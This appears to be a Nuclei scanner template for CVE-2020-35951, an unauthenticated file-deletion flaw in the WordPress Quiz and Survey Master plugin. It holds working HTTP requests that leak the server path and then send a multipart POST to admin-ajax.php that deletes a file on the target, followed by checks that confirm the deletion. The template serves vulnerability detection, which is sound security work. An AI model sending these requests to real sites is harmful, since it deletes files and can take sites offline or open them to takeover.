id: CVE-2020-35951 info: name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion author: princechaddha severity: critical description: "Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files)." reference: - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/ - https://nvd.nist.gov/vuln/detail/CVE-2020-35951 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H cvss-score: 9.9 cve-id: CVE-2020-35951 cwe-id: CWE-306 tags: cve,cve2020,wordpress,wp-plugin requests: - raw: - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} - | GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1 Host: {{Hostname}} - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92 ------WebKitFormBoundaryBJ17hSJBjuGrnW92 Content-Disposition: form-data; name="action" qsm_remove_file_fd_question ------WebKitFormBoundaryBJ17hSJBjuGrnW92 Content-Disposition: form-data; name="file_url" {{fullpath}}wp-content/plugins/quiz-master-next/README.md ------WebKitFormBoundaryBJ17hSJBjuGrnW92-- - | GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: fullpath internal: true part: body group: 1 regex: - "not found in ([/a-z_]+)wp" req-condition: true matchers-condition: and matchers: - type: word words: - '{"type":"success","message":"File removed successfully"}' part: body - type: dsl dsl: - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')" # Enhanced by mp on 2022/04/28